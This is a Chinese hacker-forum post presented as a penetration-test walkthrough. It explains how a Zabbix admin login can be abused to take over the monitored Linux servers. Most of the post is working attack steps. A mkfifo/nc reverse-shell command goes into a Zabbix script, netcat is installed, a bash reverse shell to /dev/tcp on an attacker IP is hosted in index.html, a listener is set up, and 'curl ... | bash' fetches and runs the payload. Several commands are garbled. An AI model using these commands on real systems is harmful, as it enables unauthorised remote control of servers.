联系我们联系我们
电子邮箱电子邮箱

你的Zabbix很危险-渗透测试一发千钧

[复制链接]
  • TA的每日心情
    奋斗
    昨天 08:35
  • 签到天数: 45 天

    [LV.5]常住居民I

    知秋一叶 发表于 7 天前
    1019 0

    背景

    在进行一次渗透测试的时候偶遇的情况,之前完全没有重视,这次遇到这个情况之后突然间觉得原来Zabbix命令的执行与利用也是很关键的,于是乎,就有了这篇文章。

    Zabbix简介

    Zabbix是一个基于WEB页面所提供的分布式系统监视及网络监视功能的企业级开源解决方案。

    Zabbix能够监视各种网络参数,以用来保证服务器系统的安全运营

    Zabbix可以运行的平台有很多,Linux,Solaris,HP-UX,AIX等等一系列平台都是可以的。

    Zabbix的可监视端口也有很多,如:SNMP,zabbix agent,ping

    关于Zabbix的简介就到此为止,还想更深入了解的可以咨询百度百科。

    渗透测试的过程

    前面繁琐的步骤我就不讲了,与主题无关,我会直接跳转到在已经获取了Zabbix Admin口令之后的过程中开始讲起,也就是我是如何在获取了Zabbix口令之后获取服务器shell的一个过程。

    首先我们需要在ZABBIX(官方发布的监控系统,不了解的可以百度)的脚本页面创建一个script,具体命令为:

    mkfifo /tmp/tmp-fifo

    cat/tmp/tmp-fifo丨/bin/bash-i 2>&1丨nc-丨12345丨>/tmp/tmp-fifo

    这段命令的作用就是在12345端口上设置了一个反弹shell

    再者进入检测页面,选中一台服务器,在选中服务器之后就会弹出一个脚本选项,在弹出脚本选项中创建一个”nc shell”

    这个操作的目的很简单,就是要执行刚刚创建的那个命令,需要注意的是服务器是需要安装nc的,如果没有安装的话会导致安装不成功

    接下来我就要开始安装nc了,也很简单就是一共命令的事,具体命令为:

    yum –y install nc

    到了这一步之后你与成功也只有一步之遥了,这一步就是ROOT权限,如果有ROOT权限就成功,反之则失败。

    成功的就鼓鼓掌,给自己一点鼓励,失败了的不要气馁,咱们还有后招。

    如果你不能搞定ROOT权限的话,那么利用nc搭建一个正向连接的shell是不行了

    这个时候如果你不想放弃的话只能换一条路走了,当然刚刚的那些操作也不是白来的,也是有用的。

    这个时候咱们需要来到主机页面,可以看到在这里面是监控着一台Linux平台的服务器的。(额,白话了半天还是整张图给大家看看吧~更有画面感一点)

    201809011535769581277298.jpg

    既然看到了Linux那么这个时候咱们就要理一下思路了,Linux服务器是可以抓住shell的,这一点我相信各位应该没有什么不了解。而且刚刚执行命令的时候也没有出现意外,那么我们是不是可以在服务器上开放一个特定的端口,同时在这个端口上构造好一个反弹shell的代码,这个时候不管是那一个客户端连接上此端口,那么客户端的shell都会被反弹回来,也就是反弹到我设定好的着一台服务器上面来。

    这个时候思路已经理顺了,接下来就开始操作吧~

    既然是利用服务器端口反弹的,那么现在的第一件事当然就是搭建一个WEB服务器咯,具体为:在网站根目录下创建一个index.html,具体:

    sh -i >& /dev/tcp/10.**.***.96/12345 0>&1

    这段命令的意思就是,10.**.***.96(为服务器代号),12345(端口代号)服务器与端口之间建立了一个tcp连接,并且将shell反弹至此服务器。

    随后就要开始在服务器上监听这个端口了,具体命令为:

    ubnutu:~$nc-1-p 12345 -vv

    Listening [0.0.0.0](family 0,port 12345)

    端口监听设置完毕之后咱们就要开始在服务器上建立一个脚本了,这个脚本用于反弹shell,具体命令为:

    curl 10..*.96|bash

    随后执行即可。

    OK,至此反弹shell已经成功建立,只要对方客户端连接,那么他的shell就会立刻被反弹回来。

    文章出处:危险漫步
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    发表新帖

    小黑屋|手机版|Archiver|华盟论坛 ( 京ICP证070028号 )

    Powered by 华盟网 X 8.0  © 2001-2013 Comsenz Inc.  华夏黑客同盟